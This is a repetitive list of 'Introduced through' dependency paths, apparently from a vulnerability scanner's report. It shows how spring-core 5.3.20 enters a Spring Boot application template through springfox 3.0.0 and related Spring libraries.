  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
